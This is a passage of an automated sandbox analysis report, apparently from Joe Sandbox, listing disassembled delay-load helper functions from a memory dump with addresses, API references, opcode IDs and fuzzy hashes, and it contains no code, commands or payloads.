                                                                                              • Instruction Fuzzy Hash: D0B012AA6680127D368BD1143D23E3602BCC0C0B11330C03FF004CC340D4D01C4A1171
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F382 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: f1faf52413b6e08a6f0db6fb90b2049fb1e9b1e1e2db770263f3818b73bcdae0
                                                                                              • Instruction ID: 102e22b4f99976a3f62341792a151d9cdd249f9efd931770e05f972e46be0c77
                                                                                              • Opcode Fuzzy Hash: f1faf52413b6e08a6f0db6fb90b2049fb1e9b1e1e2db770263f3818b73bcdae0
                                                                                              • Instruction Fuzzy Hash: E3B012AA2680127D368BD5143C23E3A02BCC0C0B15330C03FF404C8340D4801C455171
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F38C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 901dae7ef74fd5304b160e046d7f88860979ae0e0f57bd4b5bf98ed18f02c29f
                                                                                              • Instruction ID: 858d88c747a0ee72fced2a340ce08cadaf9cd654e2e5b775f3c1501d4f272815
                                                                                              • Opcode Fuzzy Hash: 901dae7ef74fd5304b160e046d7f88860979ae0e0f57bd4b5bf98ed18f02c29f
                                                                                              • Instruction Fuzzy Hash: 29B012AA2681127D36CBD1143C23E3602BCC0C0B11330C13FF004C8740D4801C851171
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F3DC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: f8a5ab25d8fec156a278628b57d2f1b77517978610c44f330e8dfa0834b31777
                                                                                              • Instruction ID: 01ec699559c4bd3d0b1d941db3aaf24507f386d4f117a65a2fead2cd942c832d
                                                                                              • Opcode Fuzzy Hash: f8a5ab25d8fec156a278628b57d2f1b77517978610c44f330e8dfa0834b31777
                                                                                              • Instruction Fuzzy Hash: 68B012BA26A1127D36CBD2143C33E3602BCC0D4B11330813FF004C8540D4801C811171
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F3C8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 2026ca17c161408cc53d0e27d6898d17f2cb0dc9e12f6325d810f8a9ebcd97a1
                                                                                              • Instruction ID: ed48ac38d6897208c02c53d361293910052fb2ac2f768fd8687dd873e495b501
                                                                                              • Opcode Fuzzy Hash: 2026ca17c161408cc53d0e27d6898d17f2cb0dc9e12f6325d810f8a9ebcd97a1
                                                                                              • Instruction Fuzzy Hash: 11B012BA2680127D368BD1153C23E3603BCC0C0B12370803FF004CC140D4801C415171
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F573 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F556
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: ba905ba127acaafb8233f76bda7c4e7668723e615bd521e975bf7c2515125753
                                                                                              • Instruction ID: 8e1b60d0cbbc54fddb80387b926c51e7b52cc710d04439a8e2f236cf32a1db1c
                                                                                              • Opcode Fuzzy Hash: ba905ba127acaafb8233f76bda7c4e7668723e615bd521e975bf7c2515125753
                                                                                              • Instruction Fuzzy Hash: 0FB012E52A9620BF330B56153C13E3701ACC4C4B10330813BF004C9040D5805C840071
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F57D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F556
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: d32858baf129c718db94820860400b1de0d06e38eb9b56a00dff7e1cff6ca555
                                                                                              • Instruction ID: 6e35bc7f49c9e7c0dc20d78a2d57d176f9e1b33dda84c57c4c3b82f9af1667b1
                                                                                              • Opcode Fuzzy Hash: d32858baf129c718db94820860400b1de0d06e38eb9b56a00dff7e1cff6ca555
                                                                                              • Instruction Fuzzy Hash: 1DB012E52E95207F320B56153C23F37016CD0C4B10330803BF004C9040D5805C400171
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F5A5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F556
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: a53300dde8f3337e8777a8168991fe8fefafc52e512539e872ef59ce415304a3
                                                                                              • Instruction ID: 1656d4e04b7aa62aba5927c0c3adb12ce91a47d24434fdbc4175eea9e597a862
                                                                                              • Opcode Fuzzy Hash: a53300dde8f3337e8777a8168991fe8fefafc52e512539e872ef59ce415304a3
                                                                                              • Instruction Fuzzy Hash: 80B012E52B84207F320B56157C23E37016CD0C4B10330863FF004C9040D5805C400071
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F6B4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F6AB
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5a860f43ed7af833f4d8880d68490cf1e17e60de26f6e7af187761a5e6a6ac42
                                                                                              • Instruction ID: 574713754ab8e1ed082e3320edaf18598ce1cc64bc100fa0d43ae12a78dbf5ab
                                                                                              • Opcode Fuzzy Hash: 5a860f43ed7af833f4d8880d68490cf1e17e60de26f6e7af187761a5e6a6ac42
                                                                                              • Instruction Fuzzy Hash: F4B012E63781107D330B51243C13D36016CC4C4B14330823BF004C8184D6811C880171
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F6BE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F6AB
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5215b26e3f8d149a4277d7295323dca0734aea30611680af9faddb7166096334
                                                                                              • Instruction ID: 801c5285322d374abc24377046370a9849744bb72836d30ac5f55d0cab17924f
                                                                                              • Opcode Fuzzy Hash: 5215b26e3f8d149a4277d7295323dca0734aea30611680af9faddb7166096334
                                                                                              • Instruction Fuzzy Hash: FCB012A67780107D320B51243D13D36016CC0C4B14330C13BF004CC084D6811C450171
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F699 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F6AB
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5d8f82c590b24a5b7ec5e62fba32a0b31dee16b6b94180fc32c53e22c80b4bcd
                                                                                              • Instruction ID: e2e9455a4a4796dd7794a00eb70bac1a1a0504ae5dcfc357c903265cec41622b
                                                                                              • Opcode Fuzzy Hash: 5d8f82c590b24a5b7ec5e62fba32a0b31dee16b6b94180fc32c53e22c80b4bcd
                                                                                              • Instruction Fuzzy Hash: 39B012AA7790107D320B1110BD13C36012CC8C0B14330C13BF000DC08194811C450071
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F6D2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F6AB
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: a80feed91823fb483d84169d4b2810e2d097ed4a03b6147575f86853807eb463
                                                                                              • Instruction ID: 92d440814e11f63e46631be06bb6fe8448ca4ac0ecfc683b2de251aaea2c0cb9
                                                                                              • Opcode Fuzzy Hash: a80feed91823fb483d84169d4b2810e2d097ed4a03b6147575f86853807eb463
                                                                                              • Instruction Fuzzy Hash: E0B012A6378110BD320B51143C13D3A017CC0C4B14330C13BF404CD084D4802C441171
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F6C8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F6AB
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 483478398b14689786cfcb2a3c3c5b95d9d9d2ddb54e900c8513fd8fba0e55e0
                                                                                              • Instruction ID: 037f708dd43c015ee7da8d52319abcbb4855fbf7f87f44ffabc7d25c79e8c117
                                                                                              • Opcode Fuzzy Hash: 483478398b14689786cfcb2a3c3c5b95d9d9d2ddb54e900c8513fd8fba0e55e0
                                                                                              • Instruction Fuzzy Hash: 3EB012A63780107D320B51243C23E36016CD0C4B14330813BF004C8484D6801C440171
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F733 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F70C
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 9b255c972cd8d761707193c86e7078a30da0a287b3b265b9e5f6d6a2807438d7
                                                                                              • Instruction ID: aa7edd5a898f243239637d89d1b55c6bfb3f48618c3be9f0ab2bbdb92c436c0f
                                                                                              • Opcode Fuzzy Hash: 9b255c972cd8d761707193c86e7078a30da0a287b3b265b9e5f6d6a2807438d7
                                                                                              • Instruction Fuzzy Hash: CAB012A52682107E325B51183D13E36016CC4C0B21330893FF004CC440D4846CC01031
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F73D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F70C
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: d191b870a800277609cb6ba82088613d1884df22673101d13df3b50a4a700ce8
                                                                                              • Instruction ID: 37d676dea5a73eb8fdac80367316aa97eaa79d52346ba8d748aadfe5cef0f865
